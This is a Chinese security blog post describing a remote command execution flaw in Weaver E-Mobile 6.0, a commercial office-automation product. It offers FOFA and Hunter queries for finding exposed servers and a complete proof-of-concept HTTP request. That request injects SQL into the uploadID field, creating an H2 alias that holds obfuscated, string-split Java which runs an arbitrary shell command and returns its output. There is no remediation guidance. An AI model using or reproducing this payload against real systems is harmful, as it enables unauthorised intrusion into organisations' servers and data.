泛微E-Mobile 6.0 命令执行漏洞

漏洞描述

泛微E-Mobile 6.0 存在命令执行漏洞（注：影响版本不确定，如下图6.6版本的也成功了）
版本信息：E-Mobile 6.0

漏洞复现

fofa语法：fofa：app="泛微-EMobile"
hunter：app.name="泛微 e-mobile OA"
登录页面如下：

POC：

POST /client.do HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Length: 1125

------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="method"

getupload
------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="uploadID"

1';CREATE ALIAS if not exists abcd AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL abcd('whoami');--
------WebKitFormBoundaryvVPZWWKFq310ISXS--

参考链接：https://mp.weixin.qq.com/s?__biz=Mzk0ODM0MjA0OA==&mid=2247483759&idx=1&sn=8c752411ca579df6fa7bcdbc557a1bab&chksm=c3685d20f41fd436f02cda8c023b139f4016acce0a904e6f2d04ecca752196d613e7232ced30&scene=126&sessionid=1691313401&key=ada403088d2f593d2c8c9d6802e8f94b6dc8f05cab3d4e301d2f0264178cdbb08cd1dc68ba638e13b6bed5e424578ecf90b18bcfdb33c173c780228a965d65f53cd9d31918c0d39dcb674a6245e132ddf627ba169f1f2dce7d5e7a1bb521fcd89203680002bfa7b92cce60c1a79e47a8876ca4b7b9c21b8201d93b445a9c31b3&ascene=15&uin=MTI5ODM0MTMwNQ%3D%3D&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_03c635669fc8&exportkey=n_ChQIAhIQBWlE1qKgUsUO7LGAtvVARBLvAQIE97dBBAEAAAAAAHJtBMqVmMUAAAAOpnltbLcz9gKNyK89dVj0aRA%2BAqqmEDuOMMC1jRwkwpcWCHD%2BttrytoI9ZInxCGOIRIPMc%2BHW8QbR4hNPxQBJ4Jq5ZLnCDEu%2FBbodJsvyG6wjwUUTkGEI5qL99p%2FNsL8Nhvp2IsGY4SkpazoK9B8hU9fmKXrB2qXkbQt%2FRJ1qwK%2FCtxDGLoba0ZnIIslBnIpcVVb%2FQ2Vf%2FMI23UwkS6nQcF7aptjVZ%2Bau0435ikJqR3t%2F8ZxcBWKmLHtnxazU5Iuc%2Bid6WBKlbKw32GB4OfDShPk%2BvAyzG6mR&acctmode=0&

posted @ 2023-09-01 17:37 学安全的小白阅读(3827) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】还在用 ECharts 开发大屏？试试这款永久免费的开源 BI 工具！
【推荐】国内首个AI IDE，深度理解中文开发场景，立即下载体验Trae
【推荐】编程新体验，更懂你的AI，立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包，你的智能百科全书，全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

相关博文：

· 泛微emessage管理界面存在任意文件读取漏洞2023

· 泛微E-Office init.php文件上传漏洞

· 泛微e-office任意文件上传

· E-office Server_v9.0 漏洞分析

· 泛微-移动管理平台任意文件读取漏洞

阅读排行：
· 单线程的Redis速度为什么快？
· 展开说说关于C#中ORM框架的用法！
· 阿里最新开源QwQ-32B，效果媲美deepseek-r1满血版，部署成本又又又降低了！
· Pantheons：用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探

公告

昵称：学安全的小白
园龄： 3年5个月
粉丝： 61
关注： 0

<

2025年3月

>

日

一

二

三

四

五

六

23

24

25

26

27

28

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

1

2

3

4

5

随笔分类

随笔档案

阅读排行榜

评论排行榜

推荐排行榜

最新评论

1. Re:RCE篇之无数字字母rce
我在php7下测试你的payload,也是好使的.感谢师傅.
--merak_lbz
2. Re:任意文件上传漏洞详解
计划任务的目录是固定的
--学安全的小白
3. Re:任意文件上传漏洞详解
师傅，这个当不知道网站根路径的情况下，可以通过上传计划任务的方式实现命令执行。具体是怎样上传计划任务实现的，能举个例子吗
--qingzhang123
4. Re:用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
这打码很随意呀> EXP中的忘记打掉了
--g7y12
5. Re:用友NC Cloud uploadChunk任意文件上传漏洞
👍🏻
--郑瀚Andrew